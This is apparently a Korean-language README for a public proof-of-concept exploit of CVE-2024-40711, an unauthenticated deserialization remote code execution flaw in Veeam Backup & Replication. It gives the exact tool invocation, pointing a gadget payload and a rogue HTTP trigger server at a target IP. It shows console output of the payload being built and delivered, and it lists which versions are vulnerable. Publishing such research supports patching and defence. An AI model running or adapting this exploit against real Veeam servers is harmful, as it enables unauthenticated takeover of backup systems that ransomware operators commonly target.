
CVE-2024-40711 사전 인증(Pre-Auth) 익스플로잇
Veeam Backup & Replication 사전 인증 역직렬화 취약점 CVE-2024-40711 익스플로잇
기술적 세부사항은 블로그 게시물을 참조하세요
https://github.com/user-attachments/assets/24e8122c-3e84-408b-87a9-684a9aabeb70
CVE-2024-40711.exe -f binaryformatter -g Veeam -c http://192.168.201.1:8000/trigger --targetveeam 192.168.201.158
__ .__ ___________
__ _ _______ _/ |_ ____ | |_\__ ___/_____ _ _________
\ \/ \/ /\__ \\ __\/ ___\| | \| | / _ \ \/ \/ /\_ __ \
\ / / __ \| | \ \___| Y \ |( <_> ) / | | \/
\/\_/ (____ /__| \___ >___| /____| \____/ \/\_/ |__|
\/ \/ \/
(*) Veeam Backup & Replication Unauthenticated Remote Code Execution Exploit (CVE-2024-40711)
- Vulnerability Discovered by Florian Hauser (@frycos) at CODE WHITE Gmbh (@codewhitesec)
- Exploit Written by Sina Kheirkhah (@SinSinology) at watchTowr
- Thank you to my dear friend Soroush Dalili (@irsdl) for his help
CVEs: [CVE-2024-40711]
(*) Creating payload for 'cmd /c mspaint.exe'
(*) Wrapping payload in the CDbCryptoKeyInfo custom gadget
(*) Sending Remoting Trigger
(*) Started Rogue Server
HttpServerChannel for 'trigger' created:
http://192.168.201.1:8000/trigger
Press any key to exit ...
[*] Processing message for '/trigger' from 192.168.201.158:50592 ... sending payload!
이 취약점은 CODE WHITE GmbH(@codewhitesec)의 Florian Hauser(@frycos)가 발견했습니다. 그의 뛰어난 연구를 꼭 팔로우하세요. 저희는 이 문제에 대한 익스플로잇을 재현하고 개발하는 역할만 수행했습니다.
| 버전 | 상태 |
|---|---|
| 12.2.0.334 | 완전히 패치됨. 이 블로그 게시물의 취약점에 영향을 받지 않음. |
| 12.1.2.172 | 영향을 받지만, 악용 시 인증이 필요함. 낮은 권한의 사용자도 임의 코드 실행 가능. |
| 12.1.1.56 및 이전 | 인증되지 않은 RCE에 취약함. |
이 익스플로잇은 watchTowr (@watchtowrcyber)의 Sina Kheirkhah (@SinSinology)에 의해 작성되었습니다.
또한 이 익스플로잇에 도움을 주신 Soroush Dalili님께 감사의 말씀을 전합니다.
최신 보안 연구를 위해 watchTowr 연구소 팀을 팔로우하세요.